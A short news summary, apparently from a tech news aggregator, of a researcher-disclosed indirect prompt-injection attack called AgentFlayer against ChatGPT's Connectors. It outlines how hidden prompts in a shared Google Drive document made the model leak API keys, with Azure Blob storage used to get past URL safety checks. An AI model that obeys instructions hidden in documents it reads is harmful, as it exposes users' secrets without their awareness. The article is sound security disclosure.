A Single Poisoned Document Could Leak 'Secret' Data via ChatGPT
14 days ago
- #Prompt Injection
- #AI Security
- #Data Vulnerability
- Generative AI models like ChatGPT can be connected to personal data sources such as Gmail, GitHub, and Microsoft Calendar for personalized responses.
- Security researchers revealed a vulnerability in OpenAI’s Connectors, allowing sensitive data extraction from Google Drive via indirect prompt injection attacks.
- The attack, named AgentFlayer, demonstrated how API keys could be stolen using a poisoned document shared via Google Drive.
- The vulnerability highlights increased risks as AI models integrate with external systems, expanding potential attack surfaces.
- OpenAI introduced mitigations after researchers reported the issue, but the attack method remains a concern for data security.
- The attack involved hiding malicious prompts in documents, which ChatGPT would execute without user awareness.
- Researchers bypassed OpenAI’s URL safety checks by using Microsoft Azure Blob storage to exfiltrate stolen data.
- Indirect prompt injections pose growing risks as more systems integrate with LLMs, enabling unauthorized access to sensitive data.
- Security experts warn that increased AI capabilities come with heightened risks, requiring robust protections against such attacks.